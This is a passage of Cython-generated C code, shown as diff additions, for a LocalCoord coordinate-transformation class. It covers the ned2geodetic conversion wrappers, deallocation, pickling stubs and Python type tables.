__Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("ned2geodetic_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_ned,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_ned)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 167, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "ned2geodetic_single") < 0)) __PYX_ERR(0, 167, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_ned = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("ned2geodetic_single", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 167, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.ned2geodetic_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10LocalCoord_12ned2geodetic_single(((struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *)__pyx_v_self), __pyx_v_ned); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_12ned2geodetic_single(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self, PyObject *__pyx_v_ned) { + struct NED __pyx_v_n; + struct Geodetic __pyx_v_g; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + struct NED __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("ned2geodetic_single", 0); + + /* "common/transformations/transformations.pyx":168 + * + * def ned2geodetic_single(self, ned): + * assert self.lc # <<<<<<<<<<<<<< + * cdef NED n = list2ned(ned) + * cdef Geodetic g = self.lc.ned2geodetic(n) + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = (__pyx_v_self->lc != 0); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(0, 168, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(0, 168, __pyx_L1_error) + #endif + + /* "common/transformations/transformations.pyx":169 + * def ned2geodetic_single(self, ned): + * assert self.lc + * cdef NED n = list2ned(ned) # <<<<<<<<<<<<<< + * cdef Geodetic g = self.lc.ned2geodetic(n) + * return [g.lat, g.lon, g.alt] + */ + __pyx_t_2 = __pyx_f_6common_15transformations_15transformations_list2ned(__pyx_v_ned); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 169, __pyx_L1_error) + __pyx_v_n = __pyx_t_2; + + /* "common/transformations/transformations.pyx":170 + * assert self.lc + * cdef NED n = list2ned(ned) + * cdef Geodetic g = self.lc.ned2geodetic(n) # <<<<<<<<<<<<<< + * return [g.lat, g.lon, g.alt] + * + */ + __pyx_v_g = __pyx_v_self->lc->ned2geodetic(__pyx_v_n); + + /* "common/transformations/transformations.pyx":171 + * cdef NED n = list2ned(ned) + * cdef Geodetic g = self.lc.ned2geodetic(n) + * return [g.lat, g.lon, g.alt] # <<<<<<<<<<<<<< + * + * def __dealloc__(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_3 = PyFloat_FromDouble(__pyx_v_g.lat); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 171, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyFloat_FromDouble(__pyx_v_g.lon); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 171, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyFloat_FromDouble(__pyx_v_g.alt); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 171, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = PyList_New(3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 171, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_3); + PyList_SET_ITEM(__pyx_t_6, 0, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyList_SET_ITEM(__pyx_t_6, 1, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_5); + PyList_SET_ITEM(__pyx_t_6, 2, __pyx_t_5); + __pyx_t_3 = 0; + __pyx_t_4 = 0; + __pyx_t_5 = 0; + __pyx_r = __pyx_t_6; + __pyx_t_6 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":167 + * return [n.n, n.e, n.d] + * + * def ned2geodetic_single(self, ned): # <<<<<<<<<<<<<< + * assert self.lc + * cdef NED n = list2ned(ned) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.ned2geodetic_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":173 + * return [g.lat, g.lon, g.alt] + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.lc + */ + +/* Python wrapper */ +static void __pyx_pw_6common_15transformations_15transformations_10LocalCoord_15__dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_pw_6common_15transformations_15transformations_10LocalCoord_15__dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_pf_6common_15transformations_15transformations_10LocalCoord_14__dealloc__(((struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_pf_6common_15transformations_15transformations_10LocalCoord_14__dealloc__(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "common/transformations/transformations.pyx":174 + * + * def __dealloc__(self): + * del self.lc # <<<<<<<<<<<<<< + */ + delete __pyx_v_self->lc; + + /* "common/transformations/transformations.pyx":173 + * return [g.lat, g.lon, g.alt] + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.lc + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_17__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_10LocalCoord_17__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_17__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_17__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10LocalCoord_16__reduce_cython__(((struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_16__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_self_lc_cannot_be_converted_to_a, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_19__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_10LocalCoord_19__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_19__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_19__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10LocalCoord_18__setstate_cython__(((struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_18__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_self_lc_cannot_be_converted_to_a, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_tp_new_6common_15transformations_15transformations_LocalCoord(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + return o; +} + +static void __pyx_tp_dealloc_6common_15transformations_15transformations_LocalCoord(PyObject *o) { + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6common_15transformations_15transformations_LocalCoord) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_pw_6common_15transformations_15transformations_10LocalCoord_15__dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + (*Py_TYPE(o)->tp_free)(o); +} + +static PyObject *__pyx_getprop_6common_15transformations_15transformations_10LocalCoord_ned2ecef_matrix(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_15transformations_15transformations_10LocalCoord_15ned2ecef_matrix_1__get__(o); +} + +static PyObject *__pyx_getprop_6common_15transformations_15transformations_10LocalCoord_ecef2ned_matrix(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_15transformations_15transformations_10LocalCoord_15ecef2ned_matrix_1__get__(o); +} + +static PyObject *__pyx_getprop_6common_15transformations_15transformations_10LocalCoord_ned_from_ecef_matrix(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_15transformations_15transformations_10LocalCoord_20ned_from_ecef_matrix_1__get__(o); +} + +static PyObject *__pyx_getprop_6common_15transformations_15transformations_10LocalCoord_ecef_from_ned_matrix(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6common_15transformations_15transformations_10LocalCoord_20ecef_from_ned_matrix_1__get__(o); +} + +static PyMethodDef __pyx_methods_6common_15transformations_15transformations_LocalCoord[] = { + {"from_geodetic", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_3from_geodetic, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"from_ecef", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_5from_ecef, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"ecef2ned_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_7ecef2ned_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"ned2ecef_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_9ned2ecef_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"geodetic2ned_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_11geodetic2ned_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"ned2geodetic_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_13ned2geodetic_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_17__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_19__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_6common_15transformations_15transformations_LocalCoord[] = { + {(char *)"ned2ecef_matrix", __pyx_getprop_6common_15transformations_15transformations_10LocalCoord_ned2ecef_matrix, 0, (char *)0, 0}, + {(char *)"ecef2ned_matrix", __pyx_getprop_6common_15transformations_15transformations_10LocalCoord_ecef2ned_matrix, 0, (char *)0, 0}, + {(char *)"ned_from_ecef_matrix", __pyx_getprop_6common_15transformations_15transformations_10LocalCoord_ned_from_ecef_matrix, 0, (char *)0, 0}, + {(char *)"ecef_from_ned_matrix", __pyx_getprop_6common_15transformations_15transformations_10LocalCoord_ecef_from_ned_matrix, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6common_15transformations_15transformations_LocalCoord_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6common_15transformations_15transformations_LocalCoord}, + {Py_tp_methods, (void *)__pyx_methods_6common_15transformations_15transformations_LocalCoord}, + {Py_tp_getset, (void *)__pyx_getsets_6common_15transformations_15transformations_LocalCoord}, + {Py_tp_init, (void *)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_1__init__}, + {Py_tp_new, (void *)__pyx_tp_new_6common_15transformations_15transformations_LocalCoord}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6common_15transformations_15transformations_LocalCoord_spec = { + "common.transformations.transformations.LocalCoord", + sizeof(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, + __pyx_type_6common_15transformations_15transformations_LocalCoord_slots, +}; +#else + +static PyTypeObject __pyx_type_6common_15transformations_15transformations_LocalCoord = { + PyVarObject_HEAD_INIT(0, 0) + "common.transformations.transformations.""LocalCoord", /*tp_name*/ + sizeof(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6common_15transformations_15transformations_LocalCoord, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_6common_15transformations_15transformations_LocalCoord, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_6common_15transformations_15transformations_LocalCoord, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + __pyx_pw_6common_15transformations_15transformations_10LocalCoord_1__init__, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6common_15transformations_15transformations_LocalCoord, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyMethodDef __pyx_methods[] = { + {"rot_matrix", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_13rot_matrix, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#ifndef CYTHON_SMALL_CODE +#if defined(__clang__) + #define CYTHON_SMALL_CODE +#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) + #define CYTHON_SMALL_CODE __attribute__((cold)) +#else + #define CYTHON_SMALL_CODE +#endif +#endif +/* #### Code section: pystring_table ### */ + +static int __Pyx_CreateStringTabAndInitStrings(void) { + __Pyx_StringTabEntry __pyx_string_tab[] = { + {&__pyx_n_s_AssertionError, __pyx_k_AssertionError, sizeof(__pyx_k_AssertionError), 0, 0, 1, 1}, + {&__pyx_n_s_ImportError, __pyx_k_ImportError, sizeof(__pyx_k_ImportError), 0, 0, 1, 1}, + {&__pyx_n_s_LocalCoord, __pyx_k_LocalCoord, sizeof(__pyx_k_LocalCoord), 0, 0, 1, 1}, + {&__pyx_n_s_LocalCoord___reduce_cython, __pyx_k_LocalCoord___reduce_cython, sizeof(__pyx_k_LocalCoord___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_LocalCoord___setstate_cython, __pyx_k_LocalCoord___setstate_cython, sizeof(__pyx_k_LocalCoord___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_LocalCoord_ecef2ned_single, __pyx_k_LocalCoord_ecef2ned_single, sizeof(__pyx_k_LocalCoord_ecef2ned_single), 0, 0, 1, 1}, + {&__pyx_n_s_LocalCoord_from_ecef, __pyx_k_LocalCoord_from_ecef, sizeof(__pyx_k_LocalCoord_from_ecef), 0, 0, 1, 1}, + {&__pyx_n_s_LocalCoord_from_geodetic, __pyx_k_LocalCoord_from_geodetic, sizeof(__pyx_k_LocalCoord_from_geodetic), 0, 0, 1, 1}, + {&__pyx_n_s_LocalCoord_geodetic2ned_single, __pyx_k_LocalCoord_geodetic2ned_single, sizeof(__pyx_k_LocalCoord_geodetic2ned_single), 0, 0, 1, 1}, + {&__pyx_n_s_LocalCoord_ned2ecef_single, __pyx_k_LocalCoord_ned2ecef_single, sizeof(__pyx_k_LocalCoord_ned2ecef_single), 0, 0, 1, 1}, + {&__pyx_n_s_LocalCoord_ned2geodetic_single, __pyx_k_LocalCoord_ned2geodetic_single, sizeof(__pyx_k_LocalCoord_ned2geodetic_single), 0, 0, 1, 1}, + {&__pyx_n_s_TypeError, __pyx_k_TypeError, sizeof(__pyx_k_TypeError), 0, 0, 1, 1}, + {&__pyx_n_s__3, __pyx_k__3, sizeof(__pyx_k__3), 0, 0, 1, 1}, + {&__pyx_n_s__42, __pyx_k__42, sizeof(__pyx_k__42), 0, 0, 1, 1}, + {&__pyx_n_s_array, __pyx_k_array, sizeof(__pyx_k_array), 0, 0, 1, 1}, + {&__pyx_n_s_asfortranarray, __pyx_k_asfortranarray, sizeof(__pyx_k_asfortranarray), 0, 0, 1, 1}, + {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, + {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, + {&__pyx_n_s_cls, __pyx_k_cls, sizeof(__pyx_k_cls), 0, 0, 1, 1}, + {&__pyx_kp_s_common_transformations_transform, __pyx_k_common_transformations_transform, 